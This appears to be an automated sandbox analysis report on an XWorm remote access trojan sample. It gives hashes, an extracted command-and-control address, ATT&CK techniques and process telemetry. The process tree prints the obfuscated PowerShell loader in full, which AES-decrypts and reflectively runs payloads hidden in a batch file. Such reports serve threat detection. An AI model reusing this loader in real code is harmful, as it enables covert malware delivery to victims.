xworm | ad7c1c54dbc4a02faa20044c37c24478923ca1cc17989429caf059cc622eb95e

Analysis

max time kernel
913s
max time network
1156s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
09/11/2024, 17:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ssssss.bat
Size

293KB
MD5

55045f48b34f00088c49b229bc07c30e
SHA1

f875cce5c12e06899b39223e040cad9f46ada1cd
SHA256

ad7c1c54dbc4a02faa20044c37c24478923ca1cc17989429caf059cc622eb95e
SHA512

549512c75fc5089cb7d4b41e3b55dde60ae253232f4ea7aed25296ebe6f16e6cc5d9fac8284240d23e060a6770514473eb29a81d5a6041ea43bf6d28f163ee7d
SSDEEP

3072:YIeH8waTPggAXw95luaeejSSb6wM7wXgfYM8J2Q3nfWvSYD5y6wHh9+nxMKi1/TM:gHbWAXnevGR6f2QvFIyD9+K/TvXum6

Score

10^/10

xworm discovery execution phishing rat trojan

Malware Config

Extracted

Family

xworm

149.40.62.55:60447

Attributes

Install_directory
%AppData%
install_file
System User.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/448-15-0x0000021BE1F20000-0x0000021BE1F38000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	448	powershell.exe

A potential corporate email address has been identified in the URL: A8AB776A5245B4220A490D44@AdobeOrg
phishing
A potential corporate email address has been identified in the URL: CF4957F555EE9B727F000101@AdobeOrg
phishing
A potential corporate email address has been identified in the URL: [email protected]
phishing

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
448	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
448	powershell.exe
448	powershell.exe
2440	msedge.exe
2440	msedge.exe
4952	msedge.exe
4952	msedge.exe
3692	msedge.exe
3692	msedge.exe
1912	identity_helper.exe
1912	identity_helper.exe
1908	msedge.exe
1908	msedge.exe
1908	msedge.exe
1908	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs

pid	Process
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	448	powershell.exe
Token: 33	3152	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3152	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe
2440	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5040	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4276 wrote to memory of 448	4276	cmd.exe	81
PID 4276 wrote to memory of 448	4276	cmd.exe	81
PID 2440 wrote to memory of 4220	2440	msedge.exe	90
PID 2440 wrote to memory of 4220	2440	msedge.exe	90
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4832	2440	msedge.exe	91
PID 2440 wrote to memory of 4952	2440	msedge.exe	92
PID 2440 wrote to memory of 4952	2440	msedge.exe	92
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93
PID 2440 wrote to memory of 1884	2440	msedge.exe	93

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ssssss.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nm1BOIVwFMg62nJj+FT46gafirK1QerzAciTsV/QolM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jX3hxWDIqv2IN+tBy0WraA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $eHbKp=New-Object System.IO.MemoryStream(,$param_var); $WQnGV=New-Object System.IO.MemoryStream; $ghfCO=New-Object System.IO.Compression.GZipStream($eHbKp, [IO.Compression.CompressionMode]::Decompress); $ghfCO.CopyTo($WQnGV); $ghfCO.Dispose(); $eHbKp.Dispose(); $WQnGV.Dispose(); $WQnGV.ToArray();}function execute_function($param_var,$param2_var){ $yhsic=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GuzyD=$yhsic.EntryPoint; $GuzyD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ssssss.bat';$KwMeq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ssssss.bat').Split([Environment]::NewLine);foreach ($hxuMo in $KwMeq) { if ($hxuMo.StartsWith(':: ')) { $ZEAAE=$hxuMo.Substring(3); break; }}$payloads_var=[string[]]$ZEAAE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffb95473cb8,0x7ffb95473cc8,0x7ffb95473cd8
  2⤵
  PID:4220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1832 /prefetch:2
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:8
  2⤵
  PID:1884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
  2⤵
  PID:2304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4092 /prefetch:1
  2⤵
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
  2⤵
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
  2⤵
  PID:2272
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5716 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
  2⤵
  PID:2708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4540 /prefetch:1
  2⤵
  PID:4052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
  2⤵
  PID:444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4720 /prefetch:8
  2⤵
  PID:2164
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
  2⤵
  PID:3788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:4112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:1
  2⤵
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6544 /prefetch:1
  2⤵
  PID:4748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
  2⤵
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
  2⤵
  PID:3184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:2320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1752,8784377420220445876,13410256696126063027,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2892 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1908

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4816

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4520

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C8 0x00000000000004B8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5040

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:908

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
328B

MD5
c47bdb673762c4ee9ecfdf321ba347b0

SHA1
12f230939df08ae3c0a81950d32b5af3a1c60103

SHA256
e0deb4728b79a8855b9f180d5b35ab0f1751c38c50ab2ca3031017e2d0f99060

SHA512
c20afb50ffea06bae42a3ad9ca878200e3c8c7045b0bc35987cf35b6219d3150ce85b85f17a2cd809ace7a5e958c37c62c1bde1af36dbb740178e7253d4b7341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e11c77d0fa99af6b1b282a22dcb1cf4a

SHA1
2593a41a6a63143d837700d01aa27b1817d17a4d

SHA256
d96f9bfcc81ba66db49a3385266a631899a919ed802835e6fb6b9f7759476ea0

SHA512
c8f69f503ab070a758e8e3ae57945c0172ead1894fdbfa2d853e5bb976ed3817ecc8f188eefd5092481effd4ef650788c8ff9a8d9a5ee4526f090952d7c859f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
c0a1774f8079fe496e694f35dfdcf8bc

SHA1
da3b4b9fca9a3f81b6be5b0cd6dd700603d448d3

SHA256
c041da0b90a5343ede7364ccf0428852103832c4efa8065a0cd1e8ce1ff181cb

SHA512
60d9e87f8383fe3afa2c8935f0e5a842624bb24b03b2d8057e0da342b08df18cf70bf55e41fa3ae54f73bc40a274cf6393d79ae01f6a1784273a25fa2761728b

Download Submit
